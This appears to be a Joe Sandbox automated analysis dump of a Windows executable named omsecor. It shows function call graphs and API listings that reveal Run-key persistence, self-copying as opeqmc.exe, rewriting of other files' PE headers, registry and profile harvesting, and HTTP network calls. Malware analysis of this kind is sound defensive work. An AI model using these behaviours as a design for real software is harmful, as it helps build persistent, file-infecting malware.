402ac4 SysAllocString 6342->6348 6343 402b04 6350 40a65e Sleep 6343->6350 6344->6343 6349 408f26 10 API calls 6344->6349 6347->6338 6348->6344 6351 402af7 SysAllocString 6349->6351 6352 402b0e 6350->6352 6351->6343 6353 409c49 SysAllocString 6352->6353 6354 402b6b 6352->6354 6353->6354 6355 409c49 SysAllocString 6354->6355 6356 402b83 6354->6356 6355->6356 6357 402be3 6356->6357 6358 402bea 6356->6358 6449 408825 6357->6449 6473 408692 6358->6473 6361 402be8 SysFreeString 6361->6318 6363 402c11 SysFreeString 6361->6363 6363->6318 6363->6363 6365 40a906 6364->6365 6366 406d14 2 API calls 6365->6366 6367 40a917 Sleep 6365->6367 6368 40a92c 6365->6368 6366->6365 6367->6365 6369 4078cb 12 API calls 6368->6369 6370 40aa37 6369->6370 6371 406cb5 GetVersionExW 6370->6371 6372 40aa52 6371->6372 6373 40a718 5 API calls 6372->6373 6374 40aa7e 6373->6374 6375 40a744 5 API calls 6374->6375 6377 40aa91 6375->6377 6376 406e69 22 API calls 6376->6377 6377->6376 6378 40aabc Sleep 6377->6378 6379 40aae5 GetProcessHeap HeapFree 6377->6379 6380 40a744 5 API calls 6377->6380 6378->6377 6379->6302 6380->6377 6382 40a479 6381->6382 6385 40a4dc 6382->6385 6387 40a4ef 6382->6387 6489 40a156 6382->6489 6384 40a530 InternetOpenW 6386 40a545 InternetSetOptionW 6384->6386 6384->6387 6385->6384 6385->6387 6386->6387 6387->6305 6390 40a352 6388->6390 6389 40284a 6389->6308 6389->6309 6390->6389 6391 40a442 6390->6391 6506 40a245 6390->6506 6391->6389 6514 40a2d9 6391->6514 6396 40a662 Sleep 6394->6396 6396->6313 6398 40735e __aulldiv 6397->6398 6398->6311 6400 409f37 6399->6400 6401 409f40 GetTickCount 6400->6401 6402 409f5f GetTickCount 6401->6402 6403 409fa7 6402->6403 6404 409f67 PeekMessageW 6402->6404 6403->6315 6405 409f88 Sleep 6404->6405 6406 409f7c DispatchMessageW 6404->6406 6405->6402 6406->6404 6530 40a582 6407->6530 6409 408f35 6410 408f78 SysFreeString 6409->6410 6415 408f3e 6409->6415 6423 408f96 6409->6423 6410->6410 6410->6423 6411 409039 6412 409040 6411->6412 6413 409043 SysFreeString 6411->6413 6414 409058 6411->6414 6412->6413 6413->6415 6416 409091 GetTickCount 6414->6416 6417 40905f 6414->6417 6415->6316 6425 4090ae 6416->6425 6418 40908f 6417->6418 6419 40906a SysAllocString 6417->6419 6421 409108 SysFreeString 6418->6421 6422 40911b SysFreeString 6418->6422 6419->6417 6420 409025 SysFreeString 6420->6423 6421->6421 6421->6422 6422->6415 6423->6411 6423->6420 6424 4090c7 SysAllocString 6424->6425 6425->6418 6425->6424 6427 40a582 2 API calls 6426->6427 6428 4091cc 6427->6428 6429 4091d2 6428->6429 6538 409655 6428->6538 6429->6320 6437 408a1a 6432->6437 6433 408bc4 6434 408c1c GetTickCount 6433->6434 6436 408a1e 6433->6436 6434->6436 6435 408c0d VariantClear 6435->6436 6436->6328 6437->6433 6437->6435 6437->6436 6438 408b99 SysFreeString 6437->6438 6439 408bab VariantClear 6437->6439 6440 408b6b SysFreeString 6437->6440 6438->6437 6439->6433 6439->6437 6440->6437 6445 409217 6441->6445 6442 409295 SysAllocString 6442->6334 6445->6442 6542 408091 6445->6542 6447 409c54 SysAllocString 6446->6447 6448 402a27 SysAllocString SysFreeString 6446->6448 6447->6448 6448->6326 6450 408832 6449->6450 6451 40a469 14 API calls 6450->6451 6453 408857 6451->6453 6452 40885c 6452->6361 6453->6452 6454 40a345 22 API calls 6453->6454 6462 408883 6454->6462 6455 40888a 6457 40a65e Sleep 6455->6457 6456 4088eb 6458 409f2b 5 API calls 6456->6458 6457->6452 6459 4088f6 6458->6459 6460 4089fd 5 API calls 6459->6460 6461 408911 6460->6461 6461->6455 6470 40891f 6461->6470 6462->6455 6462->6456 6550 409301 6462->6550 6464 4089f0 SysFreeString 6466 40a65e Sleep 6466->6470 6467 40a469 14 API calls 6467->6470 6468 40a345 22 API calls 6468->6470 6469 409f2b 5 API calls 6469->6470 6470->6464 6470->6466 6470->6467 6470->6468 6470->6469 6471 409301 7 API calls 6470->6471 6472 4089cd SysFreeString SysFreeString 6471->6472 6472->6470 6474 40a469 14 API calls 6473->6474 6476 4086b1 6474->6476 6475 4086b6 6475->6361 6476->6475 6477 40a345 22 API calls 6476->6477 6478 4086de 6477->6478 6479 4086e5 6478->6479 6480 4086f8 6478->6480 6481 40a65e Sleep 6479->6481 6482 409f2b 5 API calls 6480->6482 6481->6475 6484 408703 6482->6484 6483 40874a CharLowerW SysFreeString 6488 40876c 6483->6488 6484->6483 6485 408811 6487 409f2b 5 API calls 6487->6488 6488->6485 6488->6487 6561 408cb7 6488->6561 6490 40a16f 6489->6490 6491 40a16a 6489->6491 6495 40a188 SysAllocString 6490->6495 6504 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 6490->6504 6501 40a0b5 CoInitialize 6491->6501 6497 40a1b8 6495->6497 6496 40a224 6496->6385 6497->6496 6498 40a1ce FindWindowW 6497->6498 6499 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 6498->6499 6500 40a1de SetParent 6498->6500 6499->6496 6500->6499 6502 40a0cc GetModuleHandleW CreateWindowExW 6501->6502 6503 40a0fd 6502->6503 6503->6490 6505 40a093 6504->6505 6505->6495 6505->6496 6507 40a262 _memset 6506->6507 6508 40a2d6 6506->6508 6509 40a270 SysAllocString SysAllocString 6507->6509 6508->6391 6510 40a2b3 6509->6510 6511 40a2c3 SysFreeString SysFreeString 6510->6511 6520 409fb1 6510->6520 6511->6508 6513 40a2c2 6513->6511 6515 40a2f4 6514->6515 6519 40a2f0 6514->6519 6516 40a313 6515->6516 6517 40a2fe GetProcessHeap HeapFree 6515->6517 6518 409c99 11 API calls 6516->6518 6517->6516 6518->6519 6519->6389 6529 40d258 6520->6529 6522 409fbd GetTickCount 6528 409fd3 6522->6528 6523 409fde GetTickCount 6524 409fea Sleep 6523->6524 6526 40a030 6523->6526 6525 409ff2 PeekMessageW 6524->6525 6527 40a005 DispatchMessageW 6525->6527 6525->6528 6526->6513 6527->6525 6528->6523 6528->6526 6529->6522 6531 40a5a0 6530->6531 6532 40a5a4 6530->6532 6531->6409 6533 40a63f 6532->6533 6536 40a5ae 6532->6536 6534 40a63b 6533->6534 6535 40a64e SysAllocString 6533->6535 6534->6409 6535->6534 6536->6534 6537 40a632 SysFreeString 6536->6537 6537->6534 6540 40966d 6538->6540 6539 4091eb SysFreeString 6539->6429 6540->6539 6541 40c5d0 __VEC_memcpy 6540->6541 6541->6539 6544 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6542->6544 6543 408212 6543->6445 6544->6543 6546 407f4f 6544->6546 6548 407f5c 6546->6548 6547 407f71 6547->6544 6548->6547 6549 4072ed 3 API calls 6548->6549 6549->6547 6551 409314 6550->6551 6552 40933b CharLowerW 6551->6552 6554 4088de SysFreeString SysFreeString 6551->6554 6557 409364 6551->6557 6553 409351 6552->6553 6555 409362 SysFreeString 6553->6555 6556 409359 SysFreeString 6553->6556 6554->6456 6555->6557 6556->6554 6557->6554 6558 4093ae SysAllocString SysAllocString 6557->6558 6559 4093d7 SysFreeString SysFreeString 6558->6559 6559->6554 6562 408cd2 6561->6562 6563 408cd6 6562->6563 6564 408e8f 6562->6564 6565 408f17 VariantClear 6562->6565 6567 408e6d SysFreeString 6562->6567 6568 408e76 VariantClear 6562->6568 6569 408e2c SysFreeString 6562->6569 6571 409581 6562->6571 6563->6488 6564->6563 6566 408ed5 SysAllocString 6564->6566 6565->6563 6566->6563 6567->6568 6568->6562 6568->6564 6569->6562 6572 409591 6571->6572 6573 409595 6572->6573 6574 409599 CharLowerW 6572->6574 6573->6562 6575 4095fb 6574->6575 6577 4095b3 6574->6577 6576 40960a SysFreeString 6575->6576 6576->6562 6577->6575 6577->6576 6578 4095d5 CharLowerW 6577->6578 6579 4095df 6578->6579 6580 409605 SysFreeString 6579->6580 6580->6576 6950 403e18 6951 40821c PathCombineW 6950->6951 6952 403e3d 6951->6952 6953 403e87 6952->6953 6954 403e4c 6952->6954 6955 403e8f 6952->6955 6957 408248 8 API calls 6954->6957 6956 40c519 4 API calls 6955->6956 6959 403e9c 6956->6959 6957->6953 6958 40c5b9 SysFreeString 6958->6959 6959->6953 6959->6958 6960 40c43d 4 API calls 6959->6960 6961 40c00b 3 API calls 6959->6961 6962 40be3a HeapFree 6959->6962 6960->6959 6961->6959 6962->6959 6963 409a99 6964 409aa6 6963->6964 6965 409723 __VEC_memcpy 6964->6965 6966 409ac4 6965->6966 6967 409b18 6966->6967 6968 409723 __VEC_memcpy 6966->6968 6969 409ae9 6968->6969 6969->6967 6970 409af2 SysAllocString SysAllocString 6969->6970 6970->6967 6971 409f99 Sleep 6972 409fa7 6971->6972 6581 402c62 6590 406c77 RegOpenKeyExW 6581->6590 6583 402c77 6584 406cb5 GetVersionExW 6583->6584 6585 402c7c 6584->6585 6586 40a8f9 34 API calls 6585->6586 6587 402c8f 6586->6587 6588 40267a 122 API calls 6587->6588 6589 402ca8 6588->6589 6591 406c9b 6590->6591 6592 406c9f 6590->6592 6591->6583 6595 4069c0 RegQueryValueExW RegCloseKey 6592->6595 6594 406cb0 6594->6583 6595->6594 6973 40d2a4 6974 40d2ac 6973->6974 6975 40d378 __except_handler3 6974->6975 6979 40d790 6974->6979 6978 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6978->6975 6985 40d110 RtlUnwind 6978->6985 6983 40d7e5 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6979->6983 6984 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6979->6984 6980 40d99d VirtualQuery 6981 40d9b2 6980->6981 6980->6984 6982 40d9cc GetVersionExA 6981->6982 6981->6984 6982->6984 6983->6980 6983->6984 6984->6978 6986 40d128 6985->6986 6986->6978 6596 4053ea HeapCreate 6597 405408 GetProcessHeap 6596->6597 6598 40541c 6596->6598 6597->6598 6615 403740 6598->6615 6616 40375a 6615->6616 6732 40848f RegOpenKeyExW 6616->6732 6619 4037a2 ExpandEnvironmentStringsW 6742 4034a8 6619->6742 6620 403846 6624 40be3a HeapFree 6620->6624 6621 40383c 6746 4033a0 6621->6746 6625 403844 6624->6625 6630 403c10 6625->6630 6626 4037f6 SHGetFolderPathW 6627 4037c3 6626->6627 6627->6626 6628 408248 8 API calls 6627->6628 6629 403837 6627->6629 6628->6627 6629->6620 6629->6621 6631 403c29 6630->6631 6632 40848f 7 API calls 6631->6632 6633 403c6d 6632->6633 6634 403c79 ExpandEnvironmentStringsW 6633->6634 6643 403ca9 6633->6643 6760 4039ea HeapAlloc 6634->6760 6636 403e00 6639 4033a0 HeapFree 6636->6639 6637 403e0a 6640 40be3a HeapFree 6637->6640 6641 403e08 6639->6641 6640->6641 6652 4040e7 6641->6652 6642 403d18 SHGetFolderPathW 6642->6643 6643->6642 6645 408248 8 API calls 6643->6645 6646 403d88 6643->6646 6649 403df7 6643->6649 6777 4039a3 6643->6777 6645->6643 6647 40848f 7 API calls 6646->6647 6646->6649 6648 403dc8 6647->6648 6648->6649 6650 403dd4 ExpandEnvironmentStringsW 6648->6650 6649->6636 6649->6637 6651 4039a3 8 API calls 6650->6651 6651->6649 6656 404100 6652->6656 6653 40412c SHGetFolderPathW 6653->6656 6654 408248 8 API calls 6654->6656 6655 40416d 6657 404172 6655->6657 6658 40417c 6655->6658 6656->6653 6656->6654 6656->6655 6659 4033a0 HeapFree 6657->6659 6660 40be3a HeapFree 6658->6660 6661 40417a 6659->6661 6660->6661 6662 4041e4 HeapAlloc 6661->6662 6663 404212 6662->6663 6674 404453 6662->6674 6664 4042a0 RegOpenKeyExW 6663->6664 6665 40440f RegEnumKeyExW 6663->6665 6666 40443d 6663->6666 6675 40848f 7 API calls 6663->6675 6676 40435e RegOpenKeyExW 6663->6676 6677 40845d 2 API calls 6663->6677 6678 40c3f9 wvnsprintfW 6663->6678 6679 40c00b 3 API calls 6663->6679 6664->6663 6665->6663 6667 404427 RegCloseKey 6665->6667 6668 40be3a HeapFree 6666->6668 6667->6663 6669 404445 6668->6669 6670 404455 6669->6670 6671 40444b 6669->6671 6673 40be3a HeapFree 6670->6673 6672 4033a0 HeapFree 6671->6672 6672->6674 6673->6674 6680 40451b 6674->6680 6675->6663 6676->6663 6677->6663 6678->6663 6679->6663 6781 40be9d 6680->6781 6682 404535 HeapAlloc 6683 404786 6682->6683 6695 404555 6682->6695 6684 404796 6683->6684 6685 40478c 6683->6685 6687 40be3a HeapFree 6684->6687 6686 4033a0 HeapFree 6685->6686 6688 404794 6686->6688 6687->6688 6700 404a92 6688->6700 6689 4045c5 RegOpenKeyExW 6690 4045e8 RegEnumKeyExW 6689->6690 6689->6695 6690->6695 6691 404780 6692 40be3a HeapFree 6691->6692 6692->6683 6693 40476a RegCloseKey 6693->6695 6694 40848f 7 API calls 6694->6695 6695->6689 6695->6691 6695->6693 6695->6694 6696 40473d RegEnumKeyExW 6695->6696 6698 40c3f9 wvnsprintfW 6695->6698 6699 40c00b 3 API calls 6695->6699 6782 40854c RegOpenKeyExW 6695->6782 6696->6695 6698->6695 6699->6695 6706 404aab 6700->6706 6701 404ad7 SHGetFolderPathW 6701->6706 6702 404b18 6704 404b27 6702->6704 6705 404b1d 6702->6705 6703 408248 8 API calls 6703->6706 6708 40be3a HeapFree 6704->6708 6707 4033a0 HeapFree 6705->6707 6706->6701 6706->6702 6706->6703 6709 404b25 6707->6709 6708->6709 6710 405136 6709->6710 6711 405150 6710->6711 6712 40848f 7 API calls 6711->6712 6713 4051e0 ExpandEnvironmentStringsW 6711->6713 6714 40520b 6711->6714 6712->6711 6715 404e7b 8 API calls 6713->6715 6716 405211 6714->6716 6717 40521b 6714->6717 6715->6711 6718 4033a0 HeapFree 6716->6718 6719 40be3a HeapFree 6717->6719 6720 405219 6718->6720 6719->6720 6721 405229 6720->6721 6722 405238 6721->6722 6723 407b4e 9 API calls 6722->6723 6724 4052e8 6723->6724 6725 406d14 2 API calls 6724->6725 6728 405361 Sleep 6724->6728 6731 405372 6724->6731 6725->6724 6726 40537c Sleep 6726->6731 6728->6724 6729 4053cb Sleep 6729->6731 6730 4053e0 6731->6726 6731->6729 6731->6730 6786 409df4 6731->6786 6733 4084af 6732->6733 6736 4084c5 6732->6736 6750 40845d RegQueryValueExW 6733->6750 6735 403796 6735->6619 6735->6627 6736->6735 6753 40bfd0 6736->6753 6738 408518 6739 40852e 6738->6739 6740 40851f ExpandEnvironmentStringsW 6738->6740 6741 408531 GetProcessHeap HeapFree 6739->6741 6740->6739 6740->6741 6741->6735 6743 4034bc 6742->6743 6744 408248 8 API calls 6743->6744 6745 40350a 6744->6745 6745->6627 6749 4033a4 6746->6749 6747 40be3a HeapFree 6748 4033d7 6747->6748 6748->6625 6749->6747 6751 408482 RegCloseKey 6750->6751 6752 40847f 6750->6752 6751->6736 6752->6751 6754 40bfd7 6753->6754 6755 40bfda 6753->6755 6754->6738 6756 40bff3 6755->6756 6759 40be27 HeapAlloc 6755->6759 6756->6738 6758 40bffa 6758->6738 6759->6758 6761 403bb9 PathRemoveFileSpecW 6760->6761 6762 403a1a GetPrivateProfileStringW 6760->6762 6761->6643 6763 403a36 6762->6763 6774 403baf 6762->6774 6765 403a48 HeapAlloc 6763->6765 6763->6774 6764 40be3a HeapFree 6764->6761 6766 403a64 6765->6766 6765->6774 6767 403ac8 StrStrIW 6766->6767 6772 403ba9 6766->6772 6775 40c3f9 wvnsprintfW 6766->6775 6776 40c00b 3 API calls 6766->6776 6767->6766 6768 403add StrStrIW 6767->6768 6768->6766 6769 403af2 GetPrivateProfileStringW 6768->6769 6769->6766 6770 403b09 GetPrivateProfileStringW 6769->6770 6770->6766 6771 403b26 GetPrivateProfileStringW 6770->6771 6771->6766 6773 40be3a HeapFree 6772->6773 6773->6774 6774->6764 6775->6766 6776->6766 6778 4039b7 6777->6778 6779 408248 8 API calls 6778->6779 6780 4039e5 6779->6780 6780->6643 6781->6682 6783 40856f 6782->6783 6785 408585 6782->6785 6784 40845d 2 API calls 6783->6784 6784->6785 6785->6695 6787 409e01 6786->6787 6799 40beea 6787->6799 6791 409eb1 HttpOpenRequestW 6792 409ead 6791->6792 6793 409ecf HttpSendRequestW 6791->6793 6792->6731 6794 40be3a HeapFree 6793->6794 6795 409eea 6794->6795 6795->6792 6796 409eef InternetReadFile 6795->6796 6796->6792 6797 409f0c 6796->6797 6807 40bf35 6797->6807 6800 40bef4 6799->6800 6811 40beb4 6800->6811 6803 409e3e InternetConnectW 6803->6791 6803->6792 6805 40bf1c 6805->6803 6806 40beb4 WideCharToMultiByte 6805->6806 6806->6803 6808 40bf3a 6807->6808 6809 40bf3f MultiByteToWideChar 6807->6809 6808->6809 6810 40bf58 6809->6810 6810->6792 6812 40bec3 WideCharToMultiByte 6811->6812 6813 40bebe 6811->6813 6814 40bedd 6812->6814 6813->6812 6814->6803 6815 40be27 HeapAlloc 6814->6815 6815->6805 6993 40d2ac 6994 40d2ca 6993->6994 6996 40d378 __except_handler3 6993->6996 6995 40d790 __except_handler3 2 API calls 6994->6995 6997 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6995->6997 6997->6996 6998 40d110 __except_handler3 RtlUnwind 6997->6998 6998->6997 6999 402cad 7000 406c77 3 API calls 6999->7000 7001 402cc3 7000->7001 7002 406cb5 GetVersionExW 7001->7002 7003 402cc8 7002->7003 7004 40a8f9 34 API calls 7003->7004 7005 402cdb 7004->7005 7006 40267a 122 API calls 7005->7006 7007 402d00 7006->7007 7008 409c6f SysFreeString 7007->7008 7009 402d08 7008->7009 7010 4032af ExitProcess 7015 402c32 7016 40267a 122 API calls 7015->7016 7017 402c56 7016->7017 7018 409c6f SysFreeString 7017->7018 7019 402c5e 7018->7019 6816 402df3 6817 406c77 3 API calls 6816->6817 6818 402e08 6817->6818 6819 406cb5 GetVersionExW 6818->6819 6820 402e0d 6819->6820 6821 40a8f9 34 API calls 6820->6821 6822 402e20 6821->6822 6823 40267a 122 API calls 6822->6823 6824 402e39 6823->6824 7020 4094b6 7021 4094c9 7020->7021 7022 4094cd 7021->7022 7023 4094f3 CharLowerW CharLowerW 7021->7023 7024 4094e3 SysFreeString 7021->7024 7026 409560 7023->7026 7028 409512 7023->7028 7025 40957e 7024->7025 7027 40956f SysFreeString SysFreeString 7026->7027 7027->7025 7028->7026 7028->7027 7029 40953a CharLowerW 7028->7029 7030 409544 7029->7030 7031 40956a SysFreeString 7030->7031 7031->7027 7032 402db7 7033 40267a 122 API calls 7032->7033 7034 402dd1 7033->7034 7035 40183a 7036 401854 7035->7036 7037 408091 3 API calls 7036->7037 7040 401958 7036->7040 7038 40194a 7037->7038 7039 408091 3 API calls 7038->7039 7039->7040 7043 402e3e 7053 402e4d 7043->7053 7044 40327c 7045 402eb7 GetModuleFileNameW 7046 402ed6 GetCurrentDirectoryW 7045->7046 7045->7053 7046->7053 7047 402f2a GetLastError 7048 40a786 35 API calls 7047->7048 7048->7053 7049 403251 GetLastError 7049->7053 7050 403237 GetLastError 7050->7053 7051 40a786 35 API calls 7051->7053 7052 407552 Sleep 7052->7053 7053->7044 7053->7045 7053->7047 7053->7049 7053->7050 7053->7051 7053->7052 7054 40253c 50 API calls 7053->7054 7054->7053 7066 403bbf 7067 40821c PathCombineW 7066->7067 7068 403bdf 7067->7068 7069 403bf9 7068->7069 7070 403bfe 7068->7070 7071 403bee 7068->7071 7073 4039ea 12 API calls 7070->7073 7072 4039a3 8 API calls 7071->7072 7072->7069 7073->7069

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 310 40ac0e-40ac18 FindClose 308->310 311 40ac1c-40ac1f 309->311 310->311
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040AC0F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindOpen$CloseFileFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3155378417-0
                                                                                                                                                                                                                • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                                • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                                                                                                                                                                                                                  • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0040B3F7
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040B44D
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                                  • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B48D
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B49A
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 0040B500
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                                                                                                                                                                                                                • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                                                                                                                                                                                                                • API String ID: 3692109554-477663111
                                                                                                                                                                                                                • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                                                                                                                                                                                                                • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040763F
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00407714
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00407719
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1458499590-0
                                                                                                                                                                                                                • Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                                                                                                                                                                                                                • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
